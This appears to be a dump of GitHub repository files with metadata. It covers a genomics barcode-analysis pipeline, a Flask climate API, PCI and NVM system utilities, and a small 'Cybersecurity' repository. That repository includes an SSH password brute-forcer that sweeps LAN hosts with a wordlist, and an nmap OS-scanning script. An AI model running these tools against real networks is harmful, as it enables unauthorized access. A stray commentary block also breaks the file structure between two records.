analysis_fixed.Rmd has an example,\n\nthen run analysis_fixed.Rmd on the file in $out_dir/$prefix.tsv file.\n\n## help\nIf you'd like to use this idea to do a similar experiment and these aren't\nworking for you post an issue and we'll work with you to get something\nthat will work with your data.\n"
},
{
"alpha_fraction": 0.5230224132537842,
"alphanum_fraction": 0.5289255976676941,
"avg_line_length": 34.29166793823242,
"blob_id": "67437622dce63d437f7b29ba3101e37e51277e00",
"content_id": "da69a38f8eccd131771f764dc00c87ac363c3971",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 847,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 24,
"path": "/code/metadata_to_table.py",
"repo_name": "hbc/gray-enhancers",
"src_encoding": "UTF-8",
"text": "from argparse import ArgumentParser\n\n\nif __name__ == \"__main__\":\n parser = ArgumentParser()\n parser.add_argument(\"--trim\", help=\"bases to trim from front and back of read\",\n default=16)\n parser.add_argument(\"fasta\", help=\"FASTA file of enhancer sequences\")\n args = parser.parse_args()\n\n header = [\"eid\", \"species\", \"subtype\", \"sequence\"]\n print \"\\t\".join(header)\n\n with open(args.fasta) as in_handle:\n for line in in_handle:\n if line.startswith(\">\"):\n ename = line.replace(\">\", \"\")\n species = ename.split(\"_\")[1]\n subtype = ename.split(\"_\")[2]\n eid = ename.split(\"_\")[0].replace(\"-\", \"\")\n continue\n\n seq = line[args.trim:-args.trim].lower()\n print \"\\t\".join([eid, species, subtype, seq])\n"
},
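metadata_to_table.py derives eid, species and subtype purely by position in the underscore-separated FASTA header. A one-off check of that split, using the example header from trim_enhancers.py's docstring:

```python
ename = "-249753741_hs_Endogenous_chr1:6052584"  # header with '>' stripped
parts = ename.split("_")
eid = parts[0].replace("-", "")
species, subtype = parts[1], parts[2]
print(eid, species, subtype)  # -> 249753741 hs Endogenous
```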
{
"alpha_fraction": 0.6935513615608215,
"alphanum_fraction": 0.7043909430503845,
"avg_line_length": 37.06293869018555,
"blob_id": "c0f946d54d4ab6d60220938248a67e2e1de9c34a",
"content_id": "96de936f77c24a5cec5cb421545ed62464aa67eb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "RMarkdown",
"length_bytes": 5443,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 143,
"path": "/reports/TN05-analysis.Rmd",
"repo_name": "hbc/gray-enhancers",
"src_encoding": "UTF-8",
"text": "---\n html_document:\n toc: true\n highlight: zenburn\n theme: united\n---\n\n```{r setup, echo=FALSE}\nknitr::opts_chunk$set(tidy=TRUE, highlight=TRUE, dev=\"png\",\n cache=TRUE, highlight=TRUE, autodep=TRUE, warning=FALSE, error=FALSE,\n message=FALSE, prompt=TRUE, comment='', fig.cap='')\n```\n\n## Background information\nThis project is from Jesse Gray's lab, they are interested in looking at the\ncomposition of the enhancer sequences they had synthesized and stuck into some\nviral vectors. This is a second set of enhancer sequences they created;\nunlike the first set we are missing some barcode sequences.\n\nTo get to this table, we did took the enhancer sequences and trimmed off\nthe beginning and trailing bases. Then we made a bwa index of those\nenhancer sequences and aligned the query sequences to them and generated this\ntable:\n\n> infile=data/TN05_S1_L001_R1_001.fastq\n> prefix=TN05\n> out_dir=new-data\n> enhancers=metadata/TN03_newstrategy_trimmed.fa\n>\n> mkdir -p out-dir\n> bwa mem -t 6 $enhancers $infile > $out_dir/$prefix.sam\n> python ../code/single_bam_to_table.py $out_dir/$prefix.sam\n\nAs a first iteration, we did something super simple to get to this\npoint, we took the enhancer fragments and made a bwa database, then\naligned the reads to those. Before aligning the reads we stuck the\nbarcode for each read in the read name, so we could figure out which\nbarcode was associated with an alignment. Then we parsed the alignment\nfile to dump which enhancer sequence it aligned to, along with the\nbarcode that was used and some numbers about mapping quality and\nnumber of mismatches along with the sequence that was sequenced. The code to do all of this,\nand this report, is up on github [here](https://github.com/hbc/gray-enhancers).\n\nThe resulting file is pretty big, we spent some time messing around loading it\n into a SQLite and then a Postgres database, but that kept us from working with\ndplyr on the data. The ultimate solution was to just bite the bullet and load\neverything in, filtering it and writing the data out so we can just load\nthe filtered set.\n\nThe filtered set collapsed all of the same barcode + enhancer pairs into one,\nwith an added column nalignments that is the number of alignments of support\nfor that barcode + enhancer. The specific alignment kept for each barcode +\nenhancer pair was the one with the highest mapping quality and we only kept\nbarcode + enhancer pairs with at least five alignments of evidence.\n\n```{r read-data}\nlibrary(dplyr)\nlibrary(readr)\ndat = read_delim(\"TN05_mapped.tsv\", delim=\"\\t\") %>%\n group_by(barcode, ename) %>%\n mutate(nalignments = n()) %>%\n filter(nalignments > 5) %>%\n filter(mapq == max(mapq)) %>%\n do(head(., 1))\nsave(dat, file=\"enhancers.RData\")\n```\n\nNow we can just read the small data file and force the garbage collection to\nrun to free up the memory we used:\n\n```{r read-data-file}\nload(\"enhancers.RData\")\ngc()\n```\n\nThis is a much smaller set to work with, and we didn't lose much information.\n\nMost barcode-enhancer pairs have hundreds of alignments. 
We can see an uptick\nin rare barcode-enhancer pairs with less than ten alignments; those are likely\nsequencing errors in the barcode or other confused mappings.\n\n```{r alignment-distribution}\nlibrary(ggplot2)\nggplot(dat, aes(nalignments, color=mapq)) + geom_density() +\n    theme_bw(base_size=10) +\n    theme(panel.grid.major = element_line(size = .5, color = \"grey\")) +\n    xlab(\"number of alignments\") +\n    ylab(\"barcodes-enhancer pairs\") + scale_x_log10()\n```\n\nMapping quality has peaks around 10, 20 and 60.\n\n```{r quality-peaks}\nggplot(dat, aes(mapq)) + geom_histogram() +\n    theme_bw(base_size=10) +\n    theme(panel.grid.major = element_line(size = .5, color = \"grey\"))\n```\n\nHere we check to see if barcode-enhancer pairs with few alignments also have lower\nquality alignments; it looks like that is not the case.\n\n```{r alignment-distribution-by-quality}\ndat$quality <- ifelse(dat$mapq >= 60, \"high\", ifelse(dat$mapq < 60 & dat$mapq >= 20,\n    \"medium\", \"low\"))\nggplot(dat, aes(nalignments, fill=quality)) + geom_histogram() +\n    theme_bw(base_size=10) +\n    theme(panel.grid.major = element_line(size = .5, color = \"grey\")) +\n    xlab(\"number of alignments\") +\n    ylab(\"barcodes-enhancer pairs\") + scale_x_log10()\n```\n\nSome barcodes align to multiple enhancers:\n\n```{r confused-barcodes}\nggplot(dat %>% group_by(barcode) %>% summarise(enhancers=n()), aes(enhancers)) +\n    geom_histogram() +\n    theme_bw(base_size=10) +\n    theme(panel.grid.major = element_line(size = .5, color = \"grey\")) +\n    scale_y_sqrt()\n```\n\nWe will drop these since we don't know which enhancer they go to.\n\n```{r drop-confused-barcodes}\ndat = dat %>% group_by(barcode) %>% filter(n() == 1)\n```\n\nEnhancers have on average 100 different barcodes covering them:\n\n```{r enhancer-coverage}\nggplot(dat %>% group_by(ename) %>% summarise(barcodes=n()), aes(barcodes)) +\n    geom_histogram() +\n    theme_bw(base_size=10) +\n    theme(panel.grid.major = element_line(size = .5, color = \"grey\")) +\n    scale_y_sqrt() + scale_x_log10() + ylab(\"enhancers\")\n```\n\nWe'll write out this cleaned key now, dropping the nonsense columns.\n\n```{r clean-output}\ndrop_cols = c(\"eid\", \"species\", \"subtype\")\nwrite.table(dat[, !colnames(dat) %in% drop_cols], file=\"TN05_cleaned.csv\", sep=\",\", quote=FALSE, col.names=TRUE, row.names=FALSE)\n```\n"
}
] | 9 |
goblebla/SQlAlchemy | https://github.com/goblebla/SQlAlchemy | 43dccd1cafcf75d8c1820fd9e6033694990693b7 | 6b79701012f4cc69d4188462253e2d10174048c2 | 57679714079da9ff396bb15d956fc8faf56051dd | refs/heads/master | 2022-09-06T18:34:20.300326 | 2020-05-25T23:14:49 | 2020-05-25T23:14:49 | 265,156,892 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6865277290344238,
"alphanum_fraction": 0.6950396299362183,
"avg_line_length": 31.759614944458008,
"blob_id": "bacbe305318ef1fede03159ce02065d0f0b6aedb",
"content_id": "54aa07bfb9ee458a5f8b35c13a74be87fa1a9c94",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3407,
"license_type": "no_license",
"max_line_length": 136,
"num_lines": 104,
"path": "/climate_app.py",
"repo_name": "goblebla/SQlAlchemy",
"src_encoding": "UTF-8",
"text": "\nimport numpy as np\n\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func, inspect\n\nfrom flask import Flask, jsonify\nimport datetime as dt\n\n# Database setup\nengine = create_engine(\"sqlite:///Resources/hawaii.sqlite\", echo=False)\n# Reflect an existing database into new model\nBase = automap_base()\n# Reflect the tables\nBase.prepare(engine, reflect=True)\n\n#Save reference to the table\nmeasurement = Base.classes.measurement\nstation = Base.classes.station\n\n# Create our session (link) from python to the DB\nsession = Session(engine)\n\n#Flask Setup\napp = Flask(__name__)\n\n#Flask Routes\[email protected](\"/\")\ndef welcome():\n return( \n f\"Welcome to Surf's Up! - Hawaii's Climate API<br/>\"\n f\"Available Routes:<br/>\"\n f\"Precipitation Data /api/v1.0/precipitaton<br/>\"\n f\"Station Data /api/v1.0/stations<br/>\"\n f\"Temperature Yearly Data /api/v1.0/tobs<br/>\"\n f\"MIN/AVG/MAX Temperature Timeline Data<br/>\"\n f\"Start Date: /api/v1.0/<start><br/>\"\n f\"End Date: /api/v1.0/<start>/<end><br/>\"\n )\n\[email protected](\"/api/v1.0/precipitaton\")\ndef precipitaton():\n \"\"\"Returns a list of precipitations from last year\"\"\"\n # Query dates ordered by descending and retreiving the end date value\n end_date = session.query(measurement.date).order_by(measurement.date.desc()).first()\n end_date = end_date[0]\n\n ##Calculating the date 1 year ago from today\n year_ago = dt.datetime.strptime(end_date, \"%Y-%m-%d\") - dt.timedelta(days=366)\n\n #Query to retreive the data and precipitation scores\n results_precipitation = session.query(measurement.date, measurement.prcp)\\\n .filter(measurement.date >= year_ago).all()\n\n #Convert list of tuples into normal list\n precipitation_dict = dict(results_precipitation)\n\n return jsonify(precipitation_dict)\n\[email protected](\"/api/v1.0/stations\")\ndef stations():\n station_data = session.query(measurement.station).group_by(measurement.station).all()\n #Converting list o ftuples into normal list\n stations_list = list(np.ravel(station_data))\n\n return jsonify(stations_list)\n\[email protected](\"/api/v1.0/tobs\")\ndef tobs():\n end_date = session.query(measurement.date).order_by(measurement.date.desc()).first()\n end_date = end_date[0]\n\n year_ago = dt.datetime.strptime(end_date, \"%Y-%m-%d\") - dt.timedelta(days=366)\n\n results_tobs = session.query(measurement.date, measurement.tobs)\\\n .filter(measurement.date >= year_ago).all()\n\n tobs_list = list(results_tobs)\n\n return jsonify(tobs_list)\n\[email protected](\"/api/v1.0/<start>\")\ndef start(start=None):\n from_start = session.query(measurement.date, func.min(measurement.tobs), func.avg(measurement.tobs), func.max(measurement.tobs))\\\n .filter(measurement.date >= start)\\\n .group_by(measurement.date).all()\n\n from_start_list = list(from_start)\n return jsonify(from_start_list)\n\[email protected](\"/api/v1.0/<start>/<end>\")\ndef start_end(start=None, end=None):\n between_dates = session.query(measurement.date, func.min(measurement.tobs), func.avg(measurement.tobs), func.max(measurement.tobs))\\\n .filter(measurement.date >= start)\\\n .filter(measurement.date <= end)\\\n .group_by(measurement.date).all()\n\n between_date_list = list(between_dates)\n return jsonify(between_date_list)\n\n\nif __name__ == '__main__':\n app.run(debug=True)"
}
] | 1 |
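climate_app.py above exposes the Hawaii climate data as JSON endpoints. A minimal client sketch using requests, assuming the Flask dev server is running locally on its default port; the route spellings (including the app's "precipitaton" typo) are copied verbatim from the code, and the date range is just an example.

```python
import requests

BASE = "http://127.0.0.1:5000"  # Flask development server default

# route spelling copied verbatim from the app
print(requests.get(BASE + "/api/v1.0/precipitaton").json())
# MIN/AVG/MAX temperatures between two example dates
print(requests.get(BASE + "/api/v1.0/2016-08-01/2016-08-07").json())
```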
ss-hue/Cybersecurity | https://github.com/ss-hue/Cybersecurity | 8a29fe3efe33a731b7dca40dad2766f746ea37e2 | e69eaa1f22f8152e509355417f2cf981cf84a401 | 47611411cd7d8fdff4ff528abd70c6fac1302b97 | refs/heads/main | 2023-06-27T00:47:40.667569 | 2021-07-27T02:30:57 | 2021-07-27T02:30:57 | 389,748,686 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.8275862336158752,
"alphanum_fraction": 0.8275862336158752,
"avg_line_length": 42.5,
"blob_id": "518211f0b8404f9a149f6e37ec996e391dbff11f",
"content_id": "481341d64d7bcc41daf62275fd32f2b0ae9e02e7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 87,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 2,
"path": "/README.md",
"repo_name": "ss-hue/Cybersecurity",
"src_encoding": "UTF-8",
"text": "# Cybersecurity\nThis is a modest repository with some Cybersecurity scripts in Python.\n"
},
{
"alpha_fraction": 0.6350975036621094,
"alphanum_fraction": 0.6540390253067017,
"avg_line_length": 37.191490173339844,
"blob_id": "4e3716ba0515a8861a650e75bed1bef51a4bf020",
"content_id": "9dee767210f6c03852286d0929844483f1568baa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1795,
"license_type": "no_license",
"max_line_length": 179,
"num_lines": 47,
"path": "/sshConnection.py",
"repo_name": "ss-hue/Cybersecurity",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\nimport paramiko\nimport sys, os\nimport subprocess\nimport time\n\n#This will accept a rainbow table in a file.txt\nfile = sys.argv[1]\n\n#Broadcasting to all local network devices to update arp table\nbroadcast = subprocess.Popen([\"ping -c 12 192.168.1.255\"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\ntime.sleep(15)\n#Using arp -a\nhost = subprocess.Popen([\"arp -a | egrep -o '[[:digit:]]{1,3}\\.[[:digit:]]{1,3}\\.[[:digit:]]{1,3}\\.[[:digit:]]{1,2}'\"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\n\n#stdout = str(host.communicate()[0].decode(\"ascii\")).split()\nstdout = host.communicate()[0].decode(\"ascii\").split()\n\nprint(stdout)\n\ndef SSHLogin(host, port, username, password):\n \n try:\n ssh = paramiko.SSHClient()\n #If we don't have a server key enabled (which we don't, because we are scanning), then ignore the fact that the server host key is not in our list of trusted keys.\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n #Performs the login\n ssh.connect(host, port=port, username=username, password=password)\n ssh_session = ssh.get_transport().open_session()\n #Here we test whether or not we have an active ssh session (meaning that those particular credentials are valid for that particular machine).\n if ssh_session.active:\n print(\"SSH login successful on {}:{}, with username {} and password {}\".format(host, port, username, password))\n else:\n print(\"SSH login failed\")\n except Exception as e:\n return\n \n ssh.close()\n\nwith open(file, \"r\") as f:\n for l in f:\n line = l.split()\n for host in stdout:\n print(host, 22, line[0], line[1])\n SSHLogin(host, 22, line[0], line[1])\nf.close()\n"
},
{
"alpha_fraction": 0.5719217658042908,
"alphanum_fraction": 0.5880322456359863,
"avg_line_length": 23.77142906188965,
"blob_id": "3840b26bc8b3d940e7d4d9aa247c83a1d3f9a270",
"content_id": "57edcb485650f8ed3aaa1b40fbc8ccf76caab2c0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 869,
"license_type": "no_license",
"max_line_length": 179,
"num_lines": 35,
"path": "/arpToNmap.py",
"repo_name": "ss-hue/Cybersecurity",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\nimport sys, os, re\nimport subprocess\nimport time\n\n\n\nhdict = {}\n\nhost = subprocess.Popen([\"arp -a | egrep -o '[[:digit:]]{1,3}\\.[[:digit:]]{1,3}\\.[[:digit:]]{1,3}\\.[[:digit:]]{1,2}'\"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\n\nhost_out = host.communicate()[0].decode(\"ascii\").split()\n\n\n#print(host_out)\n\nfor host in host_out:\n \n if \"192\" in host:\n \n #print(\"sudo nmap -O {}\".format(host))\n nmap = subprocess.Popen([\"sudo nmap -O {}\".format(host)], stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\n #output is str type.\n output = nmap.communicate()[0].decode(\"ascii\")\n hdict[host] = re.search(\"MAC Address: .*\", output)\n print(output)\n\n\n\n \n\nfor ip, mac in hdict.items():\n if mac is not None:\n print(\"{} belongs to {}\".format(ip, mac.group())) \n\n"
}
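Both scripts in this repo shell out to `arp -a | egrep ...` to harvest IP addresses. The same extraction can be done in Python's `re` module without the shell pipeline; a sketch, assuming `arp` is on PATH and Python 3.7+ for `subprocess.run(..., capture_output=True)`:

import re
import subprocess

def arp_hosts():
    # Run `arp -a` once and pull every dotted-quad address out of its output.
    out = subprocess.run(["arp", "-a"], capture_output=True, text=True).stdout
    return re.findall(r"\b(?:\d{1,3}\.){3}\d{1,3}\b", out)

# Example:
# for ip in arp_hosts():
#     print(ip)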
] | 3 |
sbates130272/donard_tools | https://github.com/sbates130272/donard_tools | 2669ba5722cc521c9d1af9e116092c46db28d90c | 5d7d3a1ab8a8b5fca365a6f33878a59307dca8aa | d180ce18d91e7667c68593668946a015dd5943f1 | refs/heads/master | 2021-07-12T19:22:36.039947 | 2016-11-30T23:03:40 | 2016-11-30T23:03:40 | 25,712,840 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.47580087184906006,
"alphanum_fraction": 0.5211482644081116,
"avg_line_length": 29.17154884338379,
"blob_id": "e0f8c0bb089981a3970f5fffe55220c3afc8c7b0",
"content_id": "b1422ccc5cc0dc5e39d894abf12aef666ce38630",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7211,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 239,
"path": "/pcicards/pcicards",
"repo_name": "sbates130272/donard_tools",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n########################################################################\n##\n## Copyright 2014 PMC-Sierra, Inc.\n##\n## Licensed under the Apache License, Version 2.0 (the \"License\"); you\n## may not use this file except in compliance with the License. You may\n## obtain a copy of the License at\n## http://www.apache.org/licenses/LICENSE-2.0 Unless required by\n## applicable law or agreed to in writing, software distributed under the\n## License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR\n## CONDITIONS OF ANY KIND, either express or implied. See the License for\n## the specific language governing permissions and limitations under the\n## License.\n##\n########################################################################\n\n########################################################################\n##\n## Author: Logan Gunthorpe\n##\n## Date: Oct 23, 2014\n##\n## Description:\n## Simple script to print human readable information on the\n## physical PCI cards in the donard machine. The script should\n## be reasonably general but is not gaurenteed to be fully correct\n## on any other motherboard but the X9DRG-QF from SuperMicro\n##\n########################################################################\n\n\nimport os\nimport glob\n\ndevices = {(0x11f8, 0xf117) : \"PMC Mt Ramon NVMe/DMI\",\n (0x111d, 0x80d1) : \"PMC Princeton NVMe\",\n (0x11f8, 0x8543) : \"PMC Saratoga PCIe Switch\",\n (0x1425, 0x5001) : \"Chelsio T520-CR 2x10G Eth\",\n (0x1425, 0x5401) : \"Chelsio T520-CR 2x10G Eth\",\n (0x1425, 0x5501) : \"Chelsio T520-CR 2x10G Eth\",\n (0x1425, 0x5601) : \"Chelsio T520-CR 2x10G Eth\",\n (0x144d, 0xa820) : \"Samsung NVMe\",\n (0x10de, 0x1022) : \"Nvidia Tesla K20c\",\n (0x10b5, 0x8724) : \"Aplicata 4xM.2 Switch\",\n (0x1b85, 0x6018) : \"Unknown M.2 NVME SSD\",\n}\n\ndef cat(fname):\n return open(fname).read().strip()\n\nmotherboard = cat(\"/sys/devices/virtual/dmi/id/board_name\")\n\nif motherboard == \"X9DRG-QF\":\n slot_names = {\"0000:00:01.0\" : \"Slot 10\",\n \"0000:00:02.0\" : \"Slot 2 \",\n \"0000:00:03.0\" : \"Slot 4 \",\n \"0000:80:00.0\" : \"Slot 11\",\n \"0000:80:01.0\" : \"Slot 9 \",\n \"0000:80:02.0\" : \"Slot 8 \",\n \"0000:80:03.0\" : \"Slot 6 \",\n }\nelse:\n slot_names = {}\n\nmounts = [x.split() for x in open(\"/proc/mounts\")]\n\npci_ids = {}\ntry:\n cur_vendor = None\n for x in open(\"/usr/share/misc/pci.ids\"):\n if not x.strip(): continue\n if x.startswith(\"#\"): continue\n if x.startswith(\"\\t\\t\"): continue\n\n if x.startswith(\"\\t\"):\n device, name = x.split(\" \", 1)\n device = int(device, 16)\n pci_ids[(cur_vendor, device)] = name.strip()\n else:\n cur_vendor, name = x.split(\" \", 1)\n cur_vendor = int(cur_vendor, 16)\nexcept IOError:\n pass\n\nignored_root_ports = set([(0x1912, 0x0012), #Renesas PCie-PCI bridge\n (0x1912, 0x0013), #Renesas PCIe Switch (Matrox)\n ])\n\ndef filter_duplicates(devs):\n counts = {}\n\n for dev in devs:\n nonfuncdev = dev.rsplit(\".\", 1)[0]\n a,b = counts.get(nonfuncdev, (0,0))\n\n devc = len(glob.glob(os.path.join(dev, \"0000:*\")))\n\n counts[nonfuncdev] = (a+1, b+devc)\n\n def filt(dev):\n nonfuncdev, func = dev.rsplit(\".\", 1)\n devs = len(glob.glob(os.path.join(dev, \"0000:*\")))\n a,b = counts[nonfuncdev]\n\n if b == 0 and int(func == 0):\n return 0\n\n return a > 1 and not devs\n\n return [dev for dev in devs if not filt(dev)]\n\n\ndef find_slots():\n nodes = {}\n\n for slot, name in slot_names.items():\n dev = os.path.join(\"/sys/bus/pci/devices/\", slot)\n\n numa = 
int(cat(os.path.join(dev, \"numa_node\")))\n\n nodes.setdefault(numa, []).append(dev)\n\n return nodes\n\ndef print_dev(slot, devpath, indent=0):\n pcibus = os.path.basename(devpath)\n idx = int(pcibus.split(\":\")[1], 16)\n pcibus = pcibus.split(\":\", 1)[1]\n\n vendor = int(cat(os.path.join(devpath, \"vendor\")), 16)\n device = int(cat(os.path.join(devpath, \"device\")), 16)\n dclass = int(cat(os.path.join(devpath, \"class\")), 16)\n\n if (vendor, device) in devices:\n name = devices[(vendor,device)]\n elif (vendor, device) in pci_ids:\n name = pci_ids[(vendor, device)]\n elif dclass == 0x010802:\n name = \"NVMe Card (Unknown Vendor)\"\n else:\n name = \"Unknown Card\"\n\n provides = []\n\n for block in glob.glob(os.path.join(devpath, \"block\", \"*\")):\n block = os.path.basename(block)\n mount_pt = \"\"\n for m in mounts:\n if block in m[0]:\n mount_pt = m[1]\n break\n provides.append(\"%-10s %s\" % (block, mount_pt))\n\n for block in glob.glob(os.path.join(devpath, \"nvme\", \"*\")):\n block = os.path.basename(block)\n mount_pt = \"\"\n for m in mounts:\n if block in m[0]:\n mount_pt = m[1]\n break\n provides.append(\"%-10s %s\" % (block, mount_pt))\n\n net = sorted(glob.glob(os.path.join(devpath, \"net\", \"*\")))\n if net:\n provides.append(\", \".join(os.path.basename(n) for n in net))\n\n mtramon = glob.glob(os.path.join(devpath, \"mtramon\", \"*\"))\n for m in mtramon:\n provides.append(os.path.basename(m))\n\n drm = glob.glob(os.path.join(devpath, \"drm\", \"*\"))\n for d in drm:\n provides.append(\"dri/\" + os.path.basename(d))\n\n if vendor == 0x1425 and not net:\n return\n\n if not provides: provides.append(\"\")\n\n name = \" \"*indent + name\n name = name[:27]\n print \" %-7s %s - %04x:%04x %-27s %s\" % (slot, pcibus, vendor,\n device, name,\n provides[0])\n\n for p in provides[1:]:\n print \" \"*61, p\n\n\ndef print_none(slot):\n print \" %-7s - None\" % (slot)\n\n\ndef print_devs(slot, devpaths, indent=0):\n for devpath in sorted(devpaths):\n try:\n print_dev(slot, devpath, indent)\n except IOError:\n continue\n\n slot = \"\"\n\n dev_class = int(cat(os.path.join(devpath, \"class\")), 16)\n if dev_class == 0x60400:\n new_devpaths = glob.glob(os.path.join(devpath, \"0000:*\"))\n print_devs(slot, new_devpaths, indent=indent+1)\n\ndef print_slots(slots):\n\n slot_num = 1\n for path in filter_duplicates(slots):\n try:\n slot = slot_names.get(os.path.basename(path),\n \"Slot %d\" % slot_num)\n slot_num += 1\n\n devpaths = glob.glob(os.path.join(path, \"0000:*\"))\n except IOError:\n print_none(slot)\n continue\n except IndexError:\n print_none(slot)\n continue\n\n if not devpaths:\n print_none(slot)\n continue\n\n print_devs(slot, devpaths)\n\n\nif __name__ == \"__main__\":\n nodes = sorted(find_slots().items())\n\n for node, slots in nodes:\n if len(nodes) > 1:\n print \"Numa Node %d:\" % node\n print_slots(slots)\n"
},
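The pcicards script identifies cards by reading the small hex-encoded `vendor` and `device` files that Linux exposes under /sys/bus/pci/devices. A minimal sketch of that lookup, assuming a Linux host with sysfs mounted:

import os
import glob

def list_pci_ids():
    # Each PCI device directory exposes its IDs as hex strings like "0x8086".
    for dev in sorted(glob.glob("/sys/bus/pci/devices/*")):
        with open(os.path.join(dev, "vendor")) as f:
            vendor = int(f.read().strip(), 16)
        with open(os.path.join(dev, "device")) as f:
            device = int(f.read().strip(), 16)
        print("%s %04x:%04x" % (os.path.basename(dev), vendor, device))

# list_pci_ids()  # prints lines like "0000:00:01.0 8086:1901"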
{
"alpha_fraction": 0.538766086101532,
"alphanum_fraction": 0.5513032078742981,
"avg_line_length": 30.905263900756836,
"blob_id": "a5ca60ecfd3bd50e26ba2257e8e0827c1fbf2c6f",
"content_id": "52db5a36d917a49f05d4093f6c6fc69262471b18",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3031,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 95,
"path": "/mknvfs/mknvfs",
"repo_name": "sbates130272/donard_tools",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n########################################################################\n##\n## Copyright 2014 PMC-Sierra, Inc.\n##\n## Licensed under the Apache License, Version 2.0 (the \"License\"); you\n## may not use this file except in compliance with the License. You may\n## obtain a copy of the License at\n## http://www.apache.org/licenses/LICENSE-2.0 Unless required by\n## applicable law or agreed to in writing, software distributed under the\n## License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR\n## CONDITIONS OF ANY KIND, either express or implied. See the License for\n## the specific language governing permissions and limitations under the\n## License.\n##\n########################################################################\n\n########################################################################\n##\n## Author: Logan Gunthorpe\n##\n## Date: Oct 23, 2014\n##\n## Description:\n## This script recreates filesystems in psuedo-NVM devices that\n## loose their contents on reboots. (eg. pmem devices and mtramon\n## devices that do not have batteries.)\n##\n########################################################################\n\n\nfrom __future__ import print_function\n\nimport os\nimport subprocess as sp\nimport glob\nimport shutil\nimport stat\n\ndef update_mounts():\n global mounts\n mounts = dict([(x.split()[0], x.split()[1]) for x in open(\"/proc/mounts\")])\nupdate_mounts()\n\ndef mknvfs(dev=None, uuid=None):\n if not dev: return\n if dev in mounts:\n print(\"%s already mounted.\" % dev)\n return\n\n if not os.path.exists(dev):\n print(\"%s does not exist.\" % dev)\n return\n\n try:\n old_uuid = sp.check_output([\"blkid\", dev])\n except sp.CalledProcessError:\n uuid = [\"-U\", uuid] if uuid else []\n\n try:\n print(\"Creating filesystem on %s\" % dev)\n sp.check_call([\"mkfs.ext4\", dev] + uuid, stdout=open(os.devnull, \"w\"))\n except sp.CalledProcessError:\n print(\"Unable to create filesystem on %s\" % dev)\n return\n\n try:\n print(\"Mounting %s\" % dev)\n sp.check_call([\"mount\", dev])\n update_mounts()\n except sp.CalledProcessError:\n print(\"Unable to mount %s\" % dev)\n return\n\n test_dat = os.path.join(mounts[dev], \"test.dat\")\n if not os.path.exists(test_dat):\n shutil.copy(\"/root/test.dat\", test_dat)\n\n os.chmod(test_dat, (stat.S_IRUSR | stat.S_IWUSR |\n stat.S_IRGRP | stat.S_IWGRP |\n stat.S_IROTH | stat.S_IWOTH))\n\ndef find_nvme_from_dmi(*options):\n for o in options:\n g = glob.glob(os.path.join(o, \"block\", \"nvme*\"))\n if g:\n return os.path.join(\"/dev\", os.path.basename(g[0]))\n return None\n\nif __name__ == \"__main__\":\n mknvfs(\"/dev/pmem0\")\n mknvfs(\"/dev/mtramonb1\")\n mknvfs(find_nvme_from_dmi(\"/sys/block/mtramonb1/device\",\n \"/sys/class/mtramon/mtramon1/device\"),\n uuid=\"cca4ad99-6daa-4f78-b6b1-c2391badc072\")\n"
}
] | 2 |
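The key control flow in mknvfs is using `blkid`'s exit status to decide whether a device already carries a filesystem: `check_output` raises `CalledProcessError` on a blank device, and only then does the script run mkfs. A compact sketch of that probe, assuming root privileges and a real block device (/dev/pmem0 below is a placeholder):

import subprocess as sp

def has_filesystem(dev):
    # blkid exits non-zero when it cannot identify a filesystem signature on dev.
    try:
        sp.check_output(["blkid", dev])
        return True
    except sp.CalledProcessError:
        return False

# if not has_filesystem("/dev/pmem0"):
#     sp.check_call(["mkfs.ext4", "/dev/pmem0"])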
Yungxi/FinanceDataScraper | https://github.com/Yungxi/FinanceDataScraper | 903425a1ea71ca9fb3f179649f044676c342ae72 | fa87b4289714670fa086b7ec7cc032e3d11beee5 | b321cfd7b778f42a8a3a9b090aa8fb0dbf60fc06 | refs/heads/main | 2023-07-03T12:38:23.548686 | 2021-08-06T08:12:58 | 2021-08-06T08:12:58 | 393,306,134 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5561172962188721,
"alphanum_fraction": 0.5807212591171265,
"avg_line_length": 32.33707809448242,
"blob_id": "c8929b4650db15c9bcb0d7b11d01bc254e9ad6f8",
"content_id": "b0a938b3819f3a63f289c970f34549278606880a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2971,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 89,
"path": "/main.py",
"repo_name": "Yungxi/FinanceDataScraper",
"src_encoding": "UTF-8",
